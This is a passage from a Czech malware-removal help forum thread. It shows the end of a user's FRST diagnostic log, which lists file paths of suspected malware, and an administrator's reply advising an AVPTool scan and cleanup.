2019-05-22 09:27 - 2017-12-08 22:37 - 000002264 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-05-20 09:16 - 2018-01-12 10:20 - 000000000 ____D C:\Program Files\rempl
2019-05-20 09:13 - 2018-04-12 01:36 - 000000000 ____D C:\WINDOWS\INF
2019-05-20 09:06 - 2018-05-30 09:08 - 000838560 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-05-20 08:58 - 2018-05-30 08:50 - 001383040 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2019-05-15 17:26 - 2018-04-12 01:38 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2019-05-15 17:26 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\TextInput
2019-05-15 17:26 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\ShellExperiences
2019-05-15 17:26 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\bcastdvr
2019-05-15 10:16 - 2018-04-12 01:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-05-15 10:03 - 2017-12-09 17:36 - 000000000 ____D C:\WINDOWS\system32\MRT
2019-05-15 09:57 - 2017-12-09 17:35 - 132445408 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe

==================== Files in the root of some directories ================

2018-12-12 11:44 - 2018-12-08 14:47 - 000000274 ___SH () C:\Users\TATTOO NR\AppData\Roaming\arcuafh
2019-06-10 18:51 - 2019-06-11 09:49 - 000206848 _____ () C:\Users\TATTOO NR\AppData\Roaming\cookies.sqlite
2019-06-10 14:52 - 2019-06-10 14:52 - 000756914 _____ () C:\Users\TATTOO NR\AppData\Roaming\fdfbvd.exe
2019-06-11 08:58 - 2019-06-11 08:58 - 000000264 _____ () C:\Users\TATTOO NR\AppData\Roaming\IBDT5U31NO6.txt
2019-06-10 18:50 - 2019-06-10 18:50 - 000006144 ____H (Activate WIndows) C:\Users\TATTOO NR\AppData\Local\boratfilms.exe
2019-06-10 18:50 - 2019-06-10 18:51 - 018802000 ____H () C:\Users\TATTOO NR\AppData\Local\protect.exe
2019-06-10 18:50 - 2019-06-10 18:51 - 000692544 ____H (tortoi sfgdfeaf) C:\Users\TATTOO NR\AppData\Local\test.exe
2019-06-10 18:50 - 2019-06-10 18:50 - 000633344 ____H () C:\Users\TATTOO NR\AppData\Local\XHeate3r.exe

==================== FLock ================

2019-06-03 09:38 C:\System Volume Information
2019-06-11 11:22 C:\ProgramData\AMDControlPanelClient
2019-06-10 18:51 C:\ProgramData\AMDTools
2019-06-10 18:51 C:\ProgramData\WindowsTools
2019-06-10 18:51 C:\Users\TATTOO NR\AppData\Roaming\Media

==================== SigCheck ===============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ============================
Přílohy
Addition.zip
(27.96 KiB) Staženo 34 x

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118192
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Otvaranie nahodnych stranok na internete, pomaly pocitat

#8 Příspěvek od Rudy »

Zřejmě ještě nějaké zbytky po těch šmejdech, co tam byly. Udělejte sken AVPTool: http://www.viry.cz/forum/viewtopic.php?f=29&t=58179 . Utilitu stáhněte, uložte nejlépe na plochu, spusťte, nechte pracovat a po skončení akce smažte vše, co najde.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

Odpovědět